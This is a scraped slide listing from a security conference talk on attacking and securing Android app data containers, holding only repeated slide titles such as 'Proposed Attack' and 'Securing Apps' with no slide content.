
Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253

QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253

mobile fail: cracking open "secure" android containers [sectorca]

Technology

butchris john riley

htmlchris john riley

uschris john riley

txtchris john riley

diseasechris john riley

notchris john riley

rememberchris john riley

tldrchris john riley